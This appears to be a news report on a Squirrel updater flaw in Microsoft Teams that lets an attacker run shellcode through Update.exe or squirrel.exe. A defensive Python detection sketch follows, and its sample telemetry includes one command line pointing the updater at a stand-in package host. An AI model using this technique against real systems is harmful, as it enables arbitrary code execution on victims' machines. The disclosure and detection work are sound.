A malicious actor can take advantage of the vulnerability and use Microsoft Teams to download and execute malicious packages without needing special privileges.
The Microsoft Teams platform has a vulnerability that lets a malicious actor insert malicious code into the app, giving an operator the ability to execute arbitrary files on the system.
For those unfamiliar with the tool, Microsoft Teams is a communication platform that unifies multiple functions (chat, video calls, file storage and the ability to use them collaboratively). It was designed for corporate or educational use, since it allows the creation of communities or working groups that can be joined through a URL or by invitation.
The flaw affecting Teams lies in Squirrel, an open-source project used for the desktop app's installation and update process, which in turn relies on the open-source NuGet package manager to manage its data.
As several security researchers disclosed, an attacker can exploit the flaw by running an update command to achieve arbitrary code execution, BleepingComputer explained.
Other apps affected for the same reason are GitHub, WhatsApp and UiPath, although in those cases the flaw can only be exploited to download a payload.
In the case of Microsoft Teams, a payload placed in the folder is executed by using either of the commands Update.exe or squirrel.exe.
The flaw has not yet been fixed. The researcher Richard Reegun, one of those who discovered it, reported the finding to the Microsoft team; the company validated the vulnerability but postponed the patch to a future release. As Reegun explains in a post on his blog, he wanted to make the finding public once it had been fixed, but since other researchers had already posted information about it, he decided to disclose it.
“Meanwhile, any malicious actor can deceive the app's update function into downloading any malware they want using Microsoft's main code. The attack consists of extracting any nupkg package into which the attacker inserts a shellcode named squirrel.exe.”
Once the attacker has created a suitable package, he goes to the app's files and runs the command “update.exe”; the app then updates automatically and downloads the malicious package containing the shellcode to the “packages” folder, CBR explained.
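From a defender's side, the behaviour described above leaves a recognisable trail in process-creation telemetry: the Squirrel updater (Update.exe or squirrel.exe under the Teams install folder) being pointed at a package source that is not one of the normal update hosts, the updater being launched by something other than Teams itself, and an executable running out of the "packages" folder. The following detection sketch is an added example, not code from the article, from Microsoft or from the Squirrel project. The event fields are modelled on Sysmon Event ID 1 (Image, CommandLine, ParentImage), the sample events are constructed, the list of allowed update hosts and the `--update=` flag syntax are assumptions to be checked against your own baseline, and the claim that legitimate Squirrel components never execute from `packages\` is likewise an assumption about the normal install layout.

```python
"""Detection sketch for abuse of the Squirrel updater shipped with Microsoft Teams.

Added example (not from the article, Microsoft or Squirrel). Scans process-creation
records whose fields are modelled on Sysmon Event ID 1 and flags the behaviours the
article describes. Field names, sample values and allow-lists are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Hosts a legitimate Teams update is expected to fetch from. Assumption for the
# example; populate from your own baseline of observed updater traffic.
ALLOWED_UPDATE_HOSTS = {"statics.teams.cdn.office.net", "statics.teams.microsoft.com"}

SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}
# Parents that normally launch the updater (assumption: Teams itself or the updater chain).
EXPECTED_PARENTS = SQUIRREL_BINARIES | {"teams.exe"}
# Captures the host of an http(s) URL or the server of a \\server\share UNC path.
REMOTE_SOURCE_RE = re.compile(r"(?i)(?:https?://|\\\\)([^\s/\\\"']+)")


@dataclass(frozen=True)
class ProcessEvent:
    image: str         # full path of the created process
    command_line: str
    parent_image: str  # full path of the parent process


def _name(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list[str]:
    """Return the reasons an event looks like Squirrel-updater abuse (empty list = nothing odd)."""
    reasons: list[str] = []
    image = ev.image.lower()
    name = _name(ev.image)
    parent = _name(ev.parent_image)

    if name in SQUIRREL_BINARIES and "\\microsoft\\teams\\" in image:
        # Rule 1: updater directed at a package source outside the known update hosts.
        for host in REMOTE_SOURCE_RE.findall(ev.command_line):
            if host.lower() not in ALLOWED_UPDATE_HOSTS:
                reasons.append(f"updater told to fetch from unexpected source {host}")
        # Rule 2: updater started by something other than Teams or the updater chain,
        # e.g. a shell, script host or document macro.
        if parent not in EXPECTED_PARENTS:
            reasons.append(f"updater launched by unexpected parent {parent}")

    # Rule 3: the article describes the payload landing in the "packages" folder and
    # running from there. Assumption: legitimate Squirrel components run from the
    # app-<version> folder, so any execution out of packages\ is worth a look.
    if "\\microsoft\\teams\\packages\\" in image:
        reasons.append("process executing from the Teams packages folder")

    return reasons


def triage(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map event index -> reasons, for events that triggered at least one rule."""
    return {i: r for i, ev in enumerate(events) if (r := classify(ev))}


# Constructed sample telemetry: one benign update followed by two suspicious events.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
        command_line=r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --update=https://statics.teams.cdn.office.net/production-windows/',
        parent_image=r"C:\Users\alice\AppData\Local\Microsoft\Teams\current\Teams.exe",
    ),
    ProcessEvent(
        image=r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
        command_line=r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --update=https://updates.example.invalid/pkg/',
        parent_image=r"C:\Windows\System32\cmd.exe",
    ),
    ProcessEvent(
        image=r"C:\Users\alice\AppData\Local\Microsoft\Teams\packages\squirrel.exe",
        command_line=r"squirrel.exe",
        parent_image=r"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe",
    ),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

Run against the constructed sample, the benign update (event 0) produces no findings, the updater launched from a command shell and pointed at a non-Microsoft host (event 1) trips two rules, and the binary executing from the packages folder (event 2) trips the third. Rule 1 is the one most worth tuning: it depends entirely on the allow-list matching the hosts your tenant's Teams clients actually update from, so build that list from observed traffic before relying on it.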